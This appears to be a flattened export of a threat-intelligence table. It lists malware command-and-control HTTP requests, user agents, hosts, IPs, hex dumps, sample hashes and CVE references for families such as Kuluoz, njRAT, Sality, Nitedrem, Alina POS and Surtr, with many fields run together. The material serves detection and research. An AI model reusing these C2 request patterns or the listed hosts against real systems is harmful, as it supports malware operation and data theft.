Mozilla/5.0 (Windows NT 5.1; rv:21.0)
Mozilla/5.0 (Windows NT 6.1; rv:21.0)
Mozilla/5.0 (Windows NT 6.1; rv:22.0)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0)
Mozilla/5.0 (Windows NT 6.2)
Mozilla/5.0 (Windows NT 6.2; rv:21.0)
Mozilla/5.0 (Windows NT 6.2; WOW64)
Mozilla/5.0 (X11; Linux i686; rv:21.0)
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0)
Opera/9.80 (Windows NT 5.1; U; zh-sg)
Opera/9.80 (Windows NT 6.0)
Opera/9.80 (Windows NT 6.1; U; es-ES)
1052C94DC5C9BB7B99658C275B7337C64B33http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FKelihos.F#tab=2http://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/09/kelihos-strings-CRIME.html9/8/2013
73
2013-08-27CRIMEKuluoz Run command from C2n
c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e
&crc=HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 27 Aug 2013 20:06:57 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding
74
8/22/2013 23:58:00 <p> 2015-02-03APTnjRAT / Backdoor.LV<p> lv|'|'|TndfQzQyNjRFQkI =|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ...

<p> 171.ll|'|'|Li4uLi4uLk5FVy4 uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.

<p> 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX 0FFNTJD MzdE|'|'|SENTA|'|'|senta i55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2V sbCB2LiBIb2JieSBMb2JieSBBYnJp ZGdlZCBbQ29tcGF0aWJpbGl 0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,

<p>lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]
<p> lv <p> 171.ll <p> 251.ll
1d3baedd747f6f9bf92c81eb9f63b34bhttp://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.htmlhttp://bit.ly/aptsampleshttp://contagioexchange.blogspot.com/2013/08/njrat-backdoorlv-strings-apt.html6/13/2013CK
75
2013-08-21CRIMEChimerka.1 / Refyes.APOST/sys.php/sys.phpHost: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer: http://www.gmail.com
Content-length: 112
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6bede0da1abc1122acf8af91f6d6b289fhttp://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Refeys.A#tab=2http://bit.ly/crimesampleshttp://contagioexchange.blogspot.com/2013/08/refeysa-strings-CRIME.html8/1/2013
76
2013-08-21CRIMESalityGET/images/logos.gif?1f5428=8212640/logos.gif?User-Agent: Opera/9.50 (Windows NT 6.0; U; en)
Host: boyabateml.k12.tr
Cache-Control: no-cache
Opera/9.50 (Windows NT 6.0; U; en)
Opera/8.89 (Windows NT 6.0; U; en)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)
176222923eaa64b43b4f75f8afaad81e
a972f612afa03f1d0b3ffad10843e935
4f693f209daccf69b1c785573c0002c5
8/1/2013
77
2013-08-19CRIMENitedremGET/down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393/down.asp?action=install&u=User-Agent: fucking
Host: bucks.onepiecedream.com:99
fucking80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
78
2013-08-19CRIMENitedremGET/upx/kod.txt?k=123&t=7215/kod.txt?k=123&t=User-Agent: fucking
Host: 103.20.193.231:88
User-Agent: fucking80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
79
2013-08-19CRIMENitedremGET...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:..............................2817324n-79s4-43q8-8n2n-676s3qr1ops5:...............80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
80
2013-08-19CRIMENitedremGET/config.txt?&t=4593/config.txt?&t=User-Agent: Update
Host: in.onepiecedream.com:99
Cache-Control: no-cache
Update80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
81
2013-08-19CRIMENitedremGET/fish.jpg?&t=4426/fish.jpg?&t=User-Agent: Update
Host: www.dianwofacai.com
Cache-Control: no-cache
Update80,88,99508af8c499102ad2ebc1a83fdbcefecbhttp://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=enhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html8/1/2013
82
2013-08-17CRIMESalityGET/?12da89=12355930/?12da89=User-Agent: KUKU v5.06exp =9355466431
Host: www.kjwre9fqwieluoi.info
Cache-Control: no-cache
KUKU v5.06exp =9355466431CEAF4D9E1F408299144E75D7F29C1810http://www.symantec.com/connect/blogs/all-one-malware-overview-salityhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html8/1/2013
83
2013-08-17CRIMESalityGET/images/logos.gif?114bbc=9068000/logos.gif?User-Agent: KUKU v5.06exp =9355466431
Host: hayatspa.com
Cache-Control: no-cache
User-Agent: KUKU v5.06exp =9355466431CEAF4D9E1F408299144E75D7F29C1810http://www.symantec.com/connect/blogs/all-one-malware-overview-salityhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html8/1/2013
84
2013-08-17CRIMESalityGET/setting.doc/setting.docHost: yahoo.com
Cache-Control: no-cache
CEAF4D9E1F408299144E75D7F29C1810http://www.symantec.com/connect/blogs/all-one-malware-overview-salityhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html8/1/2013
85
2013-08-16CRIMETorpig /Sinowal miniloaderGET/Host: 166.78.144.80
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Content-Length: 247
Connection: close
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)011C1CA6030EE091CE7C20CD3AAECFA0http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/http://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/torpig-miniloader-strings-CRIME.html8/1/2013
86
2013-08-16CRIMETorpig /Sinowal miniloaderGET/search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0/search2?fr=Content-Type: application/x-www-form-urlencoded
Host: annotatinggramma.info
Content-Length: 2804
Connection: Keep-Alive
Cache-Control: no-cache
011C1CA6030EE091CE7C20CD3AAECFA0http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/http://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/torpig-miniloader-strings-CRIME.html8/1/2013
87
2013-08-13CRIMEEK PopadsGET/?7d456d68729292e9843cb9dde2d2f7b4=34/?/?7d456d68729292e9843cb9dde2d2f7b4=34
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://creditforums.com/discover-card/2648-why-so-hard-get-approved-discover-card.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: xrp.8taglik.info
Connection: Keep-Alive
some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
88
2013-08-13CRIMEEK PopadsGET/4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swfAccept: */*
Accept-Language: en-US
Referer: http://qkvuz.12taglik.info/?82f98f39d50070ac6bccd765eb93b37e=y15&8d97baff25493bce238a6ac40dbd2dc1=perfectboys.org
x-flash-version: 11,7,700,202
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: qkvuz.12taglik.info
Connection: Keep-Alive
nasome payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
89
2013-08-13CRIMEEK PopadsGET/855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar/855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_07
Host: fizv.11taglik.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
nasome payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
90
2013-08-13CRIMEEK PopadsGET/?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in/?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: tqhsy.8taglik.info
Connection: Keep-Alive
nasome payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2
http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
91
2013-08-13CRIMEEK PopadsGET/39ff9ff8c3b603d8eed017df64dd2799.eotAccept: */*
Referer: http://fizv.11taglik.info/?0090c763e668fab7bbb1c5576207655f=q10&c561f8448a523af56b17eb9ac7ad7a58=sansit.in
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: fizv.11taglik.info
Connection: Keep-Alive
naTTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eothttp://www.malwaresigs.com/2013/03/26/popads-exploit-kit/http://bit.ly/crimesamples8/1/2013
92
2013-08-11CRIMEAlina POS v5.6POST/duck/push.phppush.phpAccept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.6
Host: 208.98.63.226
Content-Length: 82
Cache-Control: no-cache
Alina v5.65A22ED78B6454E34217D07C4AF37B23Bhttp://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.htmlhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/alina-pos-v56-strings-CRIME.html2013-06
93
2013-08-11CRIMEAlina POS v5.6POST/adobe/version_check.php/version_check.phpAccept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.3
Host: 91.229.76.97
Content-Length: 2980
Cache-Control: no-cache
Alina v5.34c754150639aa3a86ca4d6b6342820behttp://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.htmlhttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/08/alina-pos-strings-CRIME.html2013-06
94
2013-08-11CRIMEAlina POS v6.0POST/adobe/version_check.php/version_check.phpAccept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v6.0
Host: 91.229.76.97
Content-Length: 3349
Cache-Control: no-cache
Alina v6.0http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html2013-08
95
2013-08-09APT (IN)Hanove / TouristPOST/kamp.php/kamp.php/kamp.php
Content-Type: multipart/form-data; boundary=78DDB5A902BB8FFF3F398B45BEDCD152
User-Agent: SIMPLE
Host: http://[xxx]
Content-Length: 501
Cache-Control: no-cache

--78DDB5A902BB8FFF3F398B45BEDCD152
Content-Disposition: form-data; name="uploaddir"
water/USER-6E3C3361930800270A87A2/D/ --78DDB5A902BB8FFF3F398B45BEDCD152
Content-Disposition: form-data; name="filename"; filename="license_23_05_2004_08_10_00.txt"
Content-Type: text/plain Content-Transfer-Encoding: binary
SIMPLE37207835e128516fe17af3dacc83a00c2011:09:21
96
2013-08-07APTSurtr 2nd Stage DL00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000F0 00 00 00 00 00 00 00 03 af d7 a5 01 23 01 00 00 ........ ....#...
00000100 4a 00 00 00 78 9c 13 65 30 63 30 01 62 73 06 23 J...x..e 0c0.bs.#
00000110 06 0b 06 37 20 e9 06 84 26 0c 06 0c a4 02 00 a8 ...7 ... &.......
6178, 8089, 9696.[0x0 padding] [0x5 bytes header] [0x4 bytes for compressed packet length including preceding 0x0s] [0x4 bytes for decompressed packet length + length of preceding 0's] [0x78 0x9c (zlib stream header)] [ compressed data ]

2nd stage traffic
36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl
https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/http://bit.ly/aptsamplesStrings (in stage 2):
x86_GmRemote.dll
Mark
D:\Project\GTProject\Public\List\ListManager.cpp

There are multiple stage 2 versions but this is the one we've seen most often. (CitizenLab)
8/2/2013
97
2013-08-07APTSurtr 2nd Stage DL00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........<removed>
00000100 9c 13 00 00 00 00 00 00 00 50 0e 00 00 4d 5a 90 ........ .P...MZ.
00000110 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 ........ ........
00000120 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 .....@.. ........
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000140 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba ........ ........
00000150 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 .....!.. L.!This
00000160 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 program cannot b
00000170 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 e run in DOS mod
00000180 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 36 31 e....$.. .....#61
6178, 8089, 9696.2nd stage Download36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl
https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/http://bit.ly/aptsamples8/2/2013
98
2013-08-07APTSurtr Initial GET00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
<removed>.
00000100 0a 00 00 00 64 00 00 00 00 00 00 00 00 00 ....d... ......
6178, 8089, 9696.Initial GET36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl
https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/http://bit.ly/aptsamplesStrings (in stage 1):
CrtRunTime.log
aCvVpR
_One.dll
_Fra.dll
soul
LiveUpdata_Mem\
Burn\
8/2/2013
99
2013-07-15APTTaleretGET//
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mac.gov.skies.tw
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MCI=HHMHMBLHEHNLIOJRINRIJPRJIJ; MUID=ba2c08421000e9621000355b0000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)443FED166A667AB9CBB1EF6331B8E9D7894
5328CFCB46EF18ECF7BA0D21A7ADC02C
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_linkhttp://bit.ly/aptsampleshttp://bit.ly/aptpcapsSoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
DefaultConnectionSettings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
explorer.exe http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt.html http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html
7/1/2013
100
2013-07-15APTTaleretGET/jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: tw.myblog.yahoo.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: B=8sah02d6on6k9&b=3&s=as
Mozilla/4.0 (compatible; MSIE 6.0; Win32)FED166A667AB9CBB1EF6331B8E9D7894
5328CFCB46EF18ECF7BA0D21A7ADC02C
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_linkhttp://bit.ly/aptsampleshttp://bit.ly/aptpcapshttp://contagioexchange.blogspot.com/2013/08/taleret-strings-apt.html http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html7/1/2013
Loading...
 
 
 
Malware